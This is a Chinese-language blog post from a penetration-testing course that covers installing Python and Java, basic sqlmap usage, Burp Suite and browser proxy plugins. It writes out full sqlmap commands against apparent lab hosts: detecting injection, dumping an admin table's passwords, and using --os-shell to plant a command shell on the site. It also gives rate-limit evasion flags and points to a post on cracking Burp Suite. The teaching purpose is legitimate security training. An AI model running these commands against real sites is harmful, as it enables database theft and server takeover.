渗透测试常用工具了解

举报
Gere 发表于 2022/12/31 08:17:09 2022/12/31
【摘要】 4-2 渗透测试常用工具讲解1.环境的安装(Java|python)python(2.7.16)环境的安装:python(2.7.16)下载地址下载好文件后 直接安装就可以 (各种下一步下一步)java环境的安装:Java下载地址点击同意并开始免费下载拿着安装软件直接默认安装就行,全部下一步下一步,环境建议安装C盘python默认路径:C:\Python27Java默认路径:C:\Progr...

4-2 渗透测试常用工具讲解

1.环境的安装(Java|python)

python(2.7.16)环境的安装:
python(2.7.16)下载地址
下载好文件后 直接安装就可以 (各种下一步下一步)

java环境的安装:
Java下载地址
点击同意并开始免费下载

拿着安装软件直接默认安装就行,全部下一步下一步,环境建议安装C盘

python默认路径:C:\Python27

Java默认路径:C:\Program Files\Java\jre1.8.0_211\bin

环境变量的添加

python和Java都是一门编程语言,编程语言一般都需要有那个语言对应的环境才能运行。如果我们需要在任意文件夹中直接调用那么我们就需要添加一个环境变量。

环境变量:环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数,如果我定义了这个环境变量的路径,那么当在windows系统的变量中寻找不到的时候,就会去我添加的路径去寻找对应的东西。
例如:我把桌面加入环境变量,我就可以在任意路径的cmd窗口打开桌面的文件

2.Sqlmap的基础指令

Sqlmap 是用的最为广泛的自动化检测、利用SQL注入的渗透测试工具,支持多种数据库。

下载地址

-u 指定注入点
--dbs 跑库名
--tables 跑表名
--columns 跑字段名
--dump 枚举数据
-D 指定库 -T 指定表 -C 指定字段

判读是否有注入
sqlmap -u \'http://59.63.200.79:8003/?id=1\'
所有库名
sqlmap -u \'http://59.63.200.79:8003/?id=1\' --dbs
获取maoshe库的表
sqlmap -u \'http://59.63.200.79:8003/?id=1\' -D maoshe --tables
获取admin表的字段名
sqlmap -u \'http://59.63.200.79:8003/?id=1\' -D maoshe -T admin --columns
遍历admin的password数据
sqlmap -u \'http://59.63.200.79:8003/?id=1\' -D maoshe -T admin -C password --dump
遍历admin表的所有数据
sqlmap -u \'http://59.63.200.79:8003/?id=1\' -D maoshe -T admin --dump

image-20201012184636754

sqlmap指令手册

常见指令:
--random-agent 选择随机user-agents头
--delay=1 每次探测延时1秒(防止访问过快被ban)
--count 查看数据量
--proxy "http://127.0.0.1:1080" 使用本地1080端口
--level 1-5 测试等级(最低1,最高5) level等级越高检测越详细,例如 level大于2会检测cookie注入,大于3会检测头注入
--is-dba 查询当前用户权限,如果DBA是True可以尝试直接拿webshell

sqlmap -u \'http://shop.aqlab.cn:8001/single.php?id=1\' --is-dba

2
--os-shell尝试往网站中放入一个cmdshell(就是拥有cmd权限的shell),先选择写入shell的脚本语言

sqlmap -u \'http://shop.aqlab.cn:8001/single.php?id=1\' --os-shell

image-20201012185339341

有的需要填写网站的web目录的绝对路径,有的可以直接选择好shell的脚本语言类型就可以直接拿shell

image-20201012164239050

3.Burpsuite工具的基础使用

Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

我们先进行安装把工具装好,如果遇到破解问题可以看我的帖子
https://www.zkaq.org/t/2178.html

4.浏览器插件的安装

插件可以帮助我们更好的对浏览器进行操作,例如Proxy SwitchySharp插件可以帮助我快速的使用代理

安装浏览器插件的文章地址:https://www.zkaq.org/t/3683.html

image-20201012211909722

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。